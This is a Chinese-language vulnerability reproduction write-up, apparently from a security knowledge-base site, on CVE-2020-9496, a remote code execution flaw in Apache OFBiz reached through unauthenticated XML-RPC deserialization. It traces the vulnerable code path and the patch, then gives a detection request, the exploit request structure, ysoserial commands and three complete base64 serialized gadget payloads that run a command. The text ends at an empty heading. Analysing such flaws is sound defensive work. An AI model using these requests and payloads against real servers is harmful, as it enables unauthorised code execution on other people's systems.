menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right (CVE-2020-9496)Apache Ofbiz 远程命令执行漏洞 chevron_right (CVE-2020-9496)Apache Ofbiz 远程命令执行漏洞.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    (CVE-2020-9496)Apache Ofbiz 远程命令执行漏洞.md
    25.35 KB / 2021-07-15 19:48:06
        (CVE-2020-9496)Apache Ofbiz \< 17.12.04 远程命令执行漏洞
    ==========================================================
    
    一、漏洞简介
    ------------
    
    Apache ofbiz存在反序列化漏洞,攻击者通过访问未授权接口,构造特定的xmlrpc
    http请求可以造成远程代码执行的影响
    
    二、漏洞影响
    ------------
    
    Apache Ofbiz \< 17.12.04
    
    三、复现过程
    ------------
    
    ### 判断是否存在漏洞
    
        <?xml version="1.0"?>
        <methodCall>
          <methodName>22</methodName>
          <params>
            <param>
              <value>
                <struct>
                  <member>
                    <name>22</name>
                    <value>
                      <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">c2hhZG93c29jazU=</serializable>
                    </value>
                  </member>
                </struct>
              </value>
            </param>
          </params>
        </methodCall>
    
    ![1.png](./resource/(CVE-2020-9496)ApacheOfbiz远程命令执行漏洞/media/rId25.png)
    
    发现响应
    
        Failed to read result object: invalid stream header: 73686164
    
    > 说明服务端已经将base64解码了,然后尝试读取对象,但是由于我们的是字符串,所以出错了,证明这里就是反序列化的payload所在。
    
    ### 漏洞分析
    
    -   漏洞信息:https://securitylab.github.com/advisories/GHSL-2020-069-apache\_ofbiz
    -   补丁:https://github.com/apache/ofbiz-framework/commit/4bdfb54ffb6e05215dd826ca2902c3e31420287a
    
    ![6.png](./resource/(CVE-2020-9496)ApacheOfbiz远程命令执行漏洞/media/rId27.png)
    
    根据补丁发现`framework\webtools\webapp\webtools\WEB-INF\controller.xml`中的`xmlrpc`请求增加了`<security auth="true"/>`的认证,说明默认情况下该接口访问无需认证
    
        <!-- framework\webtools\webapp\webtools\WEB-INF\controller.xml -->
        <request-map uri="xmlrpc" track-serverhit="false" track-visit="false">
            <security https="false"/>
            <event type="xmlrpc"/>
            <response name="error" type="none"/>
            <response name="success" type="none"/>
        </request-map>
    
    **调用方法**
    
    直接构造post请求发送
    
        POST /webtools/control/xmlrpc HTTP/1.1
        Host: www.0-sec.org:8443
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        DNT: 1
        Connection: close
        Upgrade-Insecure-Requests: 1
        Content-Type: application/xml
        Content-Length: 181
    
        <?xml version="1.0"?>
        <methodCall>
          <methodName>testMethod</methodName>
          <params>
            <param>
              <value>test</value>
            </param>
          </params>
        </methodCall>
    
    发现报错`org.apache.xmlrpc.server.XmlRpcNoSuchHandlerException: No such service [testMethod]`说明没有相关的方法
    
    下断点调试一下,由上面的`org.apache.ofbiz.webapp.event.XmlRpcEventHandler#invoke()`进入`execute()`,接着调用`org.apache.xmlrpc.server.XmlRpcServer#execute()`
    
    ![2.png](./resource/(CVE-2020-9496)ApacheOfbiz远程命令执行漏洞/media/rId28.png)
    
    跟入`XmlRpcServer#execute()`,发现调用了`org.apache.xmlrpc.server.XmlRpcServerWorker#execute()`,由具体的event
    handler处理XML-RPC请求
    
    ![3.png](./resource/(CVE-2020-9496)ApacheOfbiz远程命令执行漏洞/media/rId29.png)
    
    在`org.apache.ofbiz.webapp.event.XmlRpcEventHandler.ServiceRpcHandler#getHandler()`中获取Handler对应的`ModelService`,默认注册的service有3000多个,也就是可供调用的`methodName`,如果找不到service会抛出`No such service`的异常
    
    ![4.png](./resource/(CVE-2020-9496)ApacheOfbiz远程命令执行漏洞/media/rId30.png)
    
    所以此处传入一个已注册的service
    
    回到`org.apache.xmlrpc.server.XmlRpcServerWorker#execute()`,当成功查询到service后通过`handler.execute(pRequest)`进行调用,注意此处还会检查一次`ModelService`的`export`属性,因此通过遍历serviceMap找到一个`export`为`true`的方法,如`ping`
    
    ![5.png](./resource/(CVE-2020-9496)ApacheOfbiz远程命令执行漏洞/media/rId31.png)
    
    继续构造请求(下面会解释为什么需要struct块)
    
        <?xml version="1.0"?>
        <methodCall>
          <methodName>ping</methodName>
          <params>
            <param>
              <value>
                <struct>
                  <member>
                    <name>foo</name>
                    <value>aa</value>
                  </member>
                </struct>
              </value>
            </param>
          </params>
        </methodCall>
    
    响应
    
        <?xml version="1.0" encoding="UTF-8"?><methodResponse xmlns:ex="http://ws.apache.org/xmlrpc/namespaces/extensions"><params><param><value><struct><member><name>message</name><value>PONG</value></member></struct></value></param></params></methodResponse>
    
    说明成功调用ping方法
    
    **反序列化点**在`Ofbiz`自带的第三方库`xmlrpc-common-3.1.3.jar`中的`org.apache.xmlrpc.parser.SerializableParser`类能明显地看到对数据的还原操作,如果gadget到达此处能直接被反序列化而不会被过滤。
    
    ![7.png](./resource/(CVE-2020-9496)ApacheOfbiz远程命令执行漏洞/media/rId32.png)
    
    **解析xml**回到`org.apache.ofbiz.webapp.control.RequestHandler#runEvent()`方法,在其随后调用的链中,注意到`getRequest()`方法
    
        org.apache.ofbiz.webapp.control.RequestHandler.runEvent()
          org.apache.ofbiz.webapp.event.XmlRpcEventHandler.invoke()
            org.apache.ofbiz.webapp.event.XmlRpcEventHandler.execute()
              org.apache.ofbiz.webapp.event.XmlRpcEventHandler.getRequest()
    
    在getRequest()中,传入的xml数据由第三方库`xmlrpc-common.jar`来进行解析(注意到此处做了XXE防护)
    
    ![8.png](./resource/(CVE-2020-9496)ApacheOfbiz远程命令执行漏洞/media/rId33.png)
    
    该类的初始化由父类`org.apache.xmlrpc.parser.RecursiveTypeParserImpl`完成,顾名思义就是递归解析,其他的便是常规的xml元素解析操作,包括`startElement()`、`endElement()`等。我们知道在解析器解析xml数据的过程中,会触发到`scanDocument()`操作对元素进行逐一"扫描",其中就会进行`startElement()`、`endElement()`的调用,这个过程如果处理不当就会引入问题。
    
    ![9.png](./resource/(CVE-2020-9496)ApacheOfbiz远程命令执行漏洞/media/rId34.png)
    
    注意到在`endElement()`方法中对于`value`标签的处理,同样由父类完成,跟入`org.apache.xmlrpc.parser.RecursiveTypeParserImpl#endValueTag()`
    
    ![10.png](./resource/(CVE-2020-9496)ApacheOfbiz远程命令执行漏洞/media/rId35.png)
    
    在`endValueTag()`调用了`getResult()`方法,而这个方法就是上面提到的反序列化目标方法,那么接下来就是构造xml数据发送给`Ofbiz`,如果`value`的标签中存放的值为序列化数据,那么会由`SerializableParser`类进行反序列化进而触发漏洞,调用链是这个样子的
    
        org.apache.ofbiz.webapp.event.XmlRpcEventHandler.getRequest()
          org.apache.xerces.parsers.AbstractSAXParser.parse()
            org.apache.xerces.impl.XMLDocumentFragmentScannerImpl.scanDocument()
              org.apache.xmlrpc.parser.XmlRpcRequestParser.endElement()
                org.apache.xmlrpc.parser.RecursiveTypeParserImpl.endElement()
                  org.apache.xmlrpc.parser.MapParser.endElement()
                    org.apache.xmlrpc.parser.RecursiveTypeParserImpl.endValueTag()
                      org.apache.xmlrpc.parser.SerializableParser.getResult()
    
    **poc构造**
    
    接下来的问题就是如何构造出特定的xml数据
    
    以上面的ping方法为例,假设post如下数据
    
        <?xml version="1.0"?>
        <methodCall>
          <methodName>ping</methodName>
          <params>
            <param>
              <value>test</value>
            </param>
          </params>
        </methodCall>
    
    `Ofbiz`成功解析到`endValueTag()`方法,但是由于`typeParser`属性为空,因此不会进入`getResult()`方法
    
    ![11.png](./resource/(CVE-2020-9496)ApacheOfbiz远程命令执行漏洞/media/rId36.png)
    
    那么`typeParser`属性是在哪里赋值的呢?
    
    回到`org.apache.xmlrpc.parser.XmlRpcRequestParser#startElement()`,在解析器解析xml标签时,对4类标签(methodCall、params、param、value)有分别的处理,这个处理过程是随着每次遍历标签进行的,当扫描完4个必须提供的标签后,会调用父类的`startElement()`进行处理,而typeParser就是在父类中完成赋值的,随后便通过不同的解析器进入不同的解析流程,还是会调用对应解析器的`startElement`,这个过程是递归的
    
    ![12.png](./resource/(CVE-2020-9496)ApacheOfbiz远程命令执行漏洞/media/rId37.png)
    
    ![13.png](./resource/(CVE-2020-9496)ApacheOfbiz远程命令执行漏洞/media/rId38.png)
    
    分析扫描标签的递增过程,发现此处除了4个标签外,还需在`<value>`标签中含有额外的标签,才会进入default分支进而对`typeParser`赋值,此时struct就是一个很好的选择,它能把数据作为一个结构体传入。
    
    接着思考如何传入序列化数据,也即如何控制后端通过`SerializableParser`解析数据
    
    还是关注typeParser的赋值过程,这个属性就是最终将要处理不同类型数据的解析器,在`org.apache.xmlrpc.parser.RecursiveTypeParserImpl#startElement()`中,注意到`factory.getParser()`操作,将由`org.apache.xmlrpc.common.TypeFactoryImpl`类获得不同数据类型的解析类,在其中就有获取`SerializableParser`的过程
    
    ![14.png](./resource/(CVE-2020-9496)ApacheOfbiz远程命令执行漏洞/media/rId39.png)
    
    因此只要传入`<serializable>`标签便会由`SerializableParser`进行解析。
    
    此时还有个前提条件,那就是标签属性必须带有`XmlRpcWriter.EXTENSIONS_URI`才会进入后续的判断流程,因此post的数据是这样子的:
    
        <?xml version="1.0"?>
        <methodCall>
          <methodName>ping</methodName>
          <params>
            <param>
              <value>
                <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">serialized_data</serializable>
              </value>
            </param>
          </params>
        </methodCall>
    
    最后一步,数据的格式
    
    在获取到`SerializableParser`解析器后,startElement过程由父类`org.apache.xmlrpc.parser.ByteArrayParser#startElement()`完成,在其中能看到base64的解码操作,所以最终的序列化数据是需要通过base64传输的
    
    ![15.png](./resource/(CVE-2020-9496)ApacheOfbiz远程命令执行漏洞/media/rId40.png)
    
    ### 漏洞复现
    
    **这里提供三种利用链**
    
    > Since OFBiz uses vulnerable versions of the Apache Commons BeanUtils
    > Library and the Apache ROME Library, an attacker can craft malicious
    > payloads in an XML format using the ysoserial gadget tool.
    
    ![16.png](./resource/(CVE-2020-9496)ApacheOfbiz远程命令执行漏洞/media/rId42.png)
    
    > 查看ysoserial的说明:
    
        CommonsBeanutils1   @frohoff                    commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2
        ROME                @mbechler                   rome:1.0
    
        CommonsCollections5 @matthias_kaiser, @jasinner commons-collections:3.1                                                                                                                                                                             
        CommonsCollections6 @matthias_kaiser            commons-collections:3.1
    
        FileUpload1         @mbechler                   commons-fileupload:1.3.1, commons-io:2.4    
    
    > 使用ysoserial生成payload,进行base64编码,然后去掉换行符:
    
        java -jar ysoserial-0.0.6-SNAPSHOT-BETA-all.jar  CommonsBeanutils1 calc |base64 |  tr -d '\n'
    
        java -jar ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ROME calc |base64 |  tr -d '\n'
    
        java -jar ysoserial-0.0.6-SNAPSHOT-BETA-all.jar FileUpload1 "write;C:/Users/Administrator/Desktop/new/test.txt;test by cqq"|base64 |tr -d '\n'
    
    #### CommonBeanutils1的payload:
    
        rO0ABXNyABdqYXZhLnV0aWwuUHJpb3JpdHlRdWV1ZZTaMLT7P4KxAwACSQAEc2l6ZUwACmNvbXBhcmF0b3J0ABZMamF2YS91dGlsL0NvbXBhcmF0b3I7eHAAAAACc3IAK29yZy5hcGFjaGUuY29tbW9ucy5iZWFudXRpbHMuQmVhbkNvbXBhcmF0b3LjoYjqcyKkSAIAAkwACmNvbXBhcmF0b3JxAH4AAUwACHByb3BlcnR5dAASTGphdmEvbGFuZy9TdHJpbmc7eHBzcgA/b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmNvbXBhcmF0b3JzLkNvbXBhcmFibGVDb21wYXJhdG9y+/SZJbhusTcCAAB4cHQAEG91dHB1dFByb3BlcnRpZXN3BAAAAANzcgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybmFsLnhzbHRjLnRyYXguVGVtcGxhdGVzSW1wbAlXT8FurKszAwAGSQANX2luZGVudE51bWJlckkADl90cmFuc2xldEluZGV4WwAKX2J5dGVjb2Rlc3QAA1tbQlsABl9jbGFzc3QAEltMamF2YS9sYW5nL0NsYXNzO0wABV9uYW1lcQB+AARMABFfb3V0cHV0UHJvcGVydGllc3QAFkxqYXZhL3V0aWwvUHJvcGVydGllczt4cAAAAAD/dXIAA1tbQkv9GRVnZ9s3AgAAeHAAAAACdXIAAltCrPMX+AYIVOACAAB4cAAABpbK/rq+AAAAMgA5CgADACIHADcHACUHACYBABBzZXJpYWxWZXJzaW9uVUlEAQABSgEADUNvbnN0YW50VmFsdWUFrSCT85Hd7z4BAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAE1N0dWJUcmFuc2xldFBheWxvYWQBAAxJbm5lckNsYXNzZXMBADVMeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRTdHViVHJhbnNsZXRQYXlsb2FkOwEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGRvY3VtZW50AQAtTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007AQAIaGFuZGxlcnMBAEJbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAApFeGNlcHRpb25zBwAnAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGl0ZXJhdG9yAQA1TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjsBAAdoYW5kbGVyAQBBTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAApTb3VyY2VGaWxlAQAMR2FkZ2V0cy5qYXZhDAAKAAsHACgBADN5c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzJFN0dWJUcmFuc2xldFBheWxvYWQBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQAUamF2YS9pby9TZXJpYWxpemFibGUBADljb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvVHJhbnNsZXRFeGNlcHRpb24BAB95c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzAQAIPGNsaW5pdD4BABFqYXZhL2xhbmcvUnVudGltZQcAKgEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsMACwALQoAKwAuAQAEY2FsYwgAMAEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsMADIAMwoAKwA0AQANU3RhY2tNYXBUYWJsZQEAHHlzb3NlcmlhbC9Qd25lcjcxODg2NDI0MzAwNDMBAB5MeXNvc2VyaWFsL1B3bmVyNzE4ODY0MjQzMDA0MzsAIQACAAMAAQAEAAEAGgAFAAYAAQAHAAAAAgAIAAQAAQAKAAsAAQAMAAAALwABAAEAAAAFKrcAAbEAAAACAA0AAAAGAAEAAAAuAA4AAAAMAAEAAAAFAA8AOAAAAAEAEwAUAAIADAAAAD8AAAADAAAAAbEAAAACAA0AAAAGAAEAAAAzAA4AAAAgAAMAAAABAA8AOAAAAAAAAQAVABYAAQAAAAEAFwAYAAIAGQAAAAQAAQAaAAEAEwAbAAIADAAAAEkAAAAEAAAAAbEAAAACAA0AAAAGAAEAAAA3AA4AAAAqAAQAAAABAA8AOAAAAAAAAQAVABYAAQAAAAEAHAAdAAIAAAABAB4AHwADABkAAAAEAAEAGgAIACkACwABAAwAAAAkAAMAAgAAAA+nAAMBTLgALxIxtgA1V7EAAAABADYAAAADAAEDAAIAIAAAAAIAIQARAAAACgABAAIAIwAQAAl1cQB+ABAAAAHUyv66vgAAADIAGwoAAwAVBwAXBwAYBwAZAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBXHmae48bUcYAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAANGb28BAAxJbm5lckNsYXNzZXMBACVMeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb287AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAaAQAjeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb28BABBqYXZhL2xhbmcvT2JqZWN0AQAUamF2YS9pby9TZXJpYWxpemFibGUBAB95c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzACEAAgADAAEABAABABoABQAGAAEABwAAAAIACAABAAEACgALAAEADAAAAC8AAQABAAAABSq3AAGxAAAAAgANAAAABgABAAAAOwAOAAAADAABAAAABQAPABIAAAACABMAAAACABQAEQAAAAoAAQACABYAEAAJcHQABFB3bnJwdwEAeHEAfgANeA==
    
    #### ROME的payload:
    
        rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAB3CAAAAAIAAAACc3IAKGNvbS5zdW4uc3luZGljYXRpb24uZmVlZC5pbXBsLk9iamVjdEJlYW6CmQfedgSUSgIAA0wADl9jbG9uZWFibGVCZWFudAAtTGNvbS9zdW4vc3luZGljYXRpb24vZmVlZC9pbXBsL0Nsb25lYWJsZUJlYW47TAALX2VxdWFsc0JlYW50ACpMY29tL3N1bi9zeW5kaWNhdGlvbi9mZWVkL2ltcGwvRXF1YWxzQmVhbjtMAA1fdG9TdHJpbmdCZWFudAAsTGNvbS9zdW4vc3luZGljYXRpb24vZmVlZC9pbXBsL1RvU3RyaW5nQmVhbjt4cHNyACtjb20uc3VuLnN5bmRpY2F0aW9uLmZlZWQuaW1wbC5DbG9uZWFibGVCZWFu3WG7xTNPa3cCAAJMABFfaWdub3JlUHJvcGVydGllc3QAD0xqYXZhL3V0aWwvU2V0O0wABF9vYmp0ABJMamF2YS9sYW5nL09iamVjdDt4cHNyAB5qYXZhLnV0aWwuQ29sbGVjdGlvbnMkRW1wdHlTZXQV9XIdtAPLKAIAAHhwc3EAfgACc3EAfgAHcQB+AAxzcgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybmFsLnhzbHRjLnRyYXguVGVtcGxhdGVzSW1wbAlXT8FurKszAwAGSQANX2luZGVudE51bWJlckkADl90cmFuc2xldEluZGV4WwAKX2J5dGVjb2Rlc3QAA1tbQlsABl9jbGFzc3QAEltMamF2YS9sYW5nL0NsYXNzO0wABV9uYW1ldAASTGphdmEvbGFuZy9TdHJpbmc7TAARX291dHB1dFByb3BlcnRpZXN0ABZMamF2YS91dGlsL1Byb3BlcnRpZXM7eHAAAAAA/3VyAANbW0JL/RkVZ2fbNwIAAHhwAAAAAnVyAAJbQqzzF/gGCFTgAgAAeHAAAAaYyv66vgAAADIAOQoAAwAiBwA3BwAlBwAmAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBa0gk/OR3e8+AQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABNTdHViVHJhbnNsZXRQYXlsb2FkAQAMSW5uZXJDbGFzc2VzAQA1THlzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkU3R1YlRyYW5zbGV0UGF5bG9hZDsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcAJwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAoAQAzeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRTdHViVHJhbnNsZXRQYXlsb2FkAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAFGphdmEvaW8vU2VyaWFsaXphYmxlAQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAfeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cwEACDxjbGluaXQ+AQARamF2YS9sYW5nL1J1bnRpbWUHACoBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7DAAsAC0KACsALgEABGNhbGMIADABAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7DAAyADMKACsANAEADVN0YWNrTWFwVGFibGUBAB15c29zZXJpYWwvUHduZXIyMTg2NzY5NjY0NTQ1MwEAH0x5c29zZXJpYWwvUHduZXIyMTg2NzY5NjY0NTQ1MzsAIQACAAMAAQAEAAEAGgAFAAYAAQAHAAAAAgAIAAQAAQAKAAsAAQAMAAAALwABAAEAAAAFKrcAAbEAAAACAA0AAAAGAAEAAAAuAA4AAAAMAAEAAAAFAA8AOAAAAAEAEwAUAAIADAAAAD8AAAADAAAAAbEAAAACAA0AAAAGAAEAAAAzAA4AAAAgAAMAAAABAA8AOAAAAAAAAQAVABYAAQAAAAEAFwAYAAIAGQAAAAQAAQAaAAEAEwAbAAIADAAAAEkAAAAEAAAAAbEAAAACAA0AAAAGAAEAAAA3AA4AAAAqAAQAAAABAA8AOAAAAAAAAQAVABYAAQAAAAEAHAAdAAIAAAABAB4AHwADABkAAAAEAAEAGgAIACkACwABAAwAAAAkAAMAAgAAAA+nAAMBTLgALxIxtgA1V7EAAAABADYAAAADAAEDAAIAIAAAAAIAIQARAAAACgABAAIAIwAQAAl1cQB+ABcAAAHUyv66vgAAADIAGwoAAwAVBwAXBwAYBwAZAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBXHmae48bUcYAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAANGb28BAAxJbm5lckNsYXNzZXMBACVMeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb287AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAaAQAjeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb28BABBqYXZhL2xhbmcvT2JqZWN0AQAUamF2YS9pby9TZXJpYWxpemFibGUBAB95c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzACEAAgADAAEABAABABoABQAGAAEABwAAAAIACAABAAEACgALAAEADAAAAC8AAQABAAAABSq3AAGxAAAAAgANAAAABgABAAAAOwAOAAAADAABAAAABQAPABIAAAACABMAAAACABQAEQAAAAoAAQACABYAEAAJcHQABFB3bnJwdwEAeHNyAChjb20uc3VuLnN5bmRpY2F0aW9uLmZlZWQuaW1wbC5FcXVhbHNCZWFu9YoYu+X2GBECAAJMAApfYmVhbkNsYXNzdAARTGphdmEvbGFuZy9DbGFzcztMAARfb2JqcQB+AAl4cHZyAB1qYXZheC54bWwudHJhbnNmb3JtLlRlbXBsYXRlcwAAAAAAAAAAAAAAeHBxAH4AFHNyACpjb20uc3VuLnN5bmRpY2F0aW9uLmZlZWQuaW1wbC5Ub1N0cmluZ0JlYW4J9Y5KDyPuMQIAAkwACl9iZWFuQ2xhc3NxAH4AHEwABF9vYmpxAH4ACXhwcQB+AB9xAH4AFHNxAH4AG3ZxAH4AAnEAfgANc3EAfgAgcQB+ACNxAH4ADXEAfgAGcQB+AAZxAH4ABng=
    
    #### CC6的payload:
    
        rO0ABXNyABFqYXZhLnV0aWwuSGFzaFNldLpEhZWWuLc0AwAAeHB3DAAAAAI/QAAAAAAAAXNyADRvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMua2V5dmFsdWUuVGllZE1hcEVudHJ5iq3SmznBH9sCAAJMAANrZXl0ABJMamF2YS9sYW5nL09iamVjdDtMAANtYXB0AA9MamF2YS91dGlsL01hcDt4cHQAA2Zvb3NyACpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMubWFwLkxhenlNYXBu5ZSCnnkQlAMAAUwAB2ZhY3Rvcnl0ACxMb3JnL2FwYWNoZS9jb21tb25zL2NvbGxlY3Rpb25zL1RyYW5zZm9ybWVyO3hwc3IAOm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5mdW5jdG9ycy5DaGFpbmVkVHJhbnNmb3JtZXIwx5fsKHqXBAIAAVsADWlUcmFuc2Zvcm1lcnN0AC1bTG9yZy9hcGFjaGUvY29tbW9ucy9jb2xsZWN0aW9ucy9UcmFuc2Zvcm1lcjt4cHVyAC1bTG9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5UcmFuc2Zvcm1lcju9Virx2DQYmQIAAHhwAAAABXNyADtvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuQ29uc3RhbnRUcmFuc2Zvcm1lclh2kBFBArGUAgABTAAJaUNvbnN0YW50cQB+AAN4cHZyABFqYXZhLmxhbmcuUnVudGltZQAAAAAAAAAAAAAAeHBzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkludm9rZXJUcmFuc2Zvcm1lcofo/2t7fM44AgADWwAFaUFyZ3N0ABNbTGphdmEvbGFuZy9PYmplY3Q7TAALaU1ldGhvZE5hbWV0ABJMamF2YS9sYW5nL1N0cmluZztbAAtpUGFyYW1UeXBlc3QAEltMamF2YS9sYW5nL0NsYXNzO3hwdXIAE1tMamF2YS5sYW5nLk9iamVjdDuQzlifEHMpbAIAAHhwAAAAAnQACmdldFJ1bnRpbWV1cgASW0xqYXZhLmxhbmcuQ2xhc3M7qxbXrsvNWpkCAAB4cAAAAAB0AAlnZXRNZXRob2R1cQB+ABsAAAACdnIAEGphdmEubGFuZy5TdHJpbmeg8KQ4ejuzQgIAAHhwdnEAfgAbc3EAfgATdXEAfgAYAAAAAnB1cQB+ABgAAAAAdAAGaW52b2tldXEAfgAbAAAAAnZyABBqYXZhLmxhbmcuT2JqZWN0AAAAAAAAAAAAAAB4cHZxAH4AGHNxAH4AE3VyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0AARjYWxjdAAEZXhlY3VxAH4AGwAAAAFxAH4AIHNxAH4AD3NyABFqYXZhLmxhbmcuSW50ZWdlchLioKT3gYc4AgABSQAFdmFsdWV4cgAQamF2YS5sYW5nLk51bWJlcoaslR0LlOCLAgAAeHAAAAABc3IAEWphdmEudXRpbC5IYXNoTWFwBQfawcMWYNEDAAJGAApsb2FkRmFjdG9ySQAJdGhyZXNob2xkeHA/QAAAAAAAAHcIAAAAEAAAAAB4eHg=
    
    ![20200921164354403.gif](./resource/(CVE-2020-9496)ApacheOfbiz远程命令执行漏洞/media/rId46.gif)
    
    **调用链**
    
